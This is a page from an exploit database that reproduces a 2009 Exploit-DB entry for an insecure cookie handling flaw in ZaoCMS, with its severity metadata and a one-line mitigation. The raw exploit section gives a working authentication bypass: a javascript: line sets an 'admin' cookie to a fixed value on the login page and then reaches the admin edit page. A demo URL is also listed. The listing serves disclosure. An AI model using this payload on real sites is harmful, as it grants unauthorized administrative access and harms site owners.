header-logo
Suggest Exploit
vendor:
ZaoCMS
by:
His0k4, Dr-HTmL, Dos-Dz TeaM, Snakes TeaM ArAb Academy Security Team, and Ev!L-C0d3r
7,5
CVSS
HIGH
Insecure Cookie Handling
613
CWE
Product Name: ZaoCMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

ZaoCMS Insecure Cookie Handling Vulnerability

An attacker can exploit this vulnerability by setting a malicious cookie in the admin/login.php page and then accessing the admin/edit.php page. A demo of the exploit can be found at http://demo.zaocms.com/admin/login.php.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.
Source

Exploit-DB raw data:

--------------------------------------------------------------
ZaoCMS Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
Home:http://www.zaocms.com/
Software : ZaoCMS
---------------------------------------------------------------
Exploit:
---------
admin/login.php
javascript:document.cookie="admin=stgAdmin;path=/";
Then Go To
admin/edit.php
demo:
-------
http://demo.zaocms.com/admin/login.php
-----------------------------------------------------------------------------------------------------
His0k4  - Dr-HTmL , Dos-Dz TeaM , Snakes TeaM ArAb Academy Security Team,And Ev!L-C0d3r.
-----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-05-21]

Navigation

Suggest Exploit

Services By CQR